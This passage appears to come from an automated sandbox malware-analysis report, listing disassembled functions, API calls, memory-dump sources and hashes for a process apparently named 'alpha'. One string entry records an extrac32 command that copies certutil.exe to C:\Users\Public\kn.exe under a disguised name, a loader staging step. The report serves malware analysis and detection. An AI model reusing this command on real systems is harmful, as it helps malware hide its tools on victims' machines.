                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6A91
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6AB0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6AE3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC68A3,?,?,?,?,?,?,?,00000000,?,00007FF706EC63F3), ref: 00007FF706EC6B01
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2770779731-632268628
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 95d1b0c25e9a5e1883cf14c2b3fc76810e3ed8d0ceb023ffebfcaca328916550
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F31ED26A09B66C5E650AF11EC6027BB7E0FF85F59B858175EA4E47398EF3CE405C320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDD878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3192234081-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 83c6f3174a3b579ebadd7fe12e8c240958e4f91e8ebe855abd28d4682bb8a28e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D318F367087528BE714AF21AC2467EEBA1FF89B94F84A234DE4A07795CF3DD4018B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC1630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC1673
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC168D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC1757
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC176E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC1788
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF706EC14D6,?,?,?,00007FF706EBAA22,?,?,?,00007FF706EB847E), ref: 00007FF706EC179C
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$Size
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3586862581-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 24e91c3d980a36a7d5da98f60c3bab7d29f1ba0e7af7c6f145d9f29f71f32c41
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26915F35A09B4282EA10AF15EC602BAF6A0FF55BA4FD98535DA5D037E5DF3CE452C320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC86F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1313749407-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4d92934be291f9f07cde4750fa62f4c4b06f54e8ade49188cba87a2c1f3febfa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F51C836B0978282FA107F159D2417BEA91BF45BA0FD85234DE1E477D5EF3CE8468220
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDEC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 920682188-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a1e5131e08feca5547cee2d1f88c231bf885b8bc60576f1ea1a1c0fa656bdbfb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98512836705B858AEB25EF21DC642E9B7A1FF88B88F888135CA4D4B754EF3CD6458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBDF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF706EBE00B
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 777023205-3344945345
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 53a0a4433051f8b2f785c66eb16cb0a63c9f7616d80db91828768e717dce03b3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98513970D0DB4286FB14AB15ACA017BFAA0BF68790FD95536D94E823A5DF3CA4408720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBF5D7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF1BA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF1E7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF2BB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: )$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1959970872-2167043656
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3e186912945701bb13f2fec769cbc268c3c0a8c6c3280107b7ee1e855c71e695
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8a5d63c360e4c13ef561f3ce3dd80187a3c2d8689f5c743dd181e811bfffbc3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88419AA4E0875786FB647B14AD3827BFAA0BF20745FC4A236C98D421A4DF3CA8458661
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED91B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3625580822-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 35a3eac17c1534fbe81d43c19aca6fd19ba72e3bcdd2e9bd35e4d3e11767db97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8831A125A0874682EA14BB42BD201BBF2A4BF55B98FC85134DE1D177D6EF3CE445C360
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC1FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcsspn
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3809306610-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c1ac224328112a7378df654f5699de352bf9cf411d9ff9ce1b7eeaceb00e96a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCB19F62A08B4686EA50EB19EC7027BA7A0FF54B90FC58031DA4E47795DF7DE942C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED8C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswdigit$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
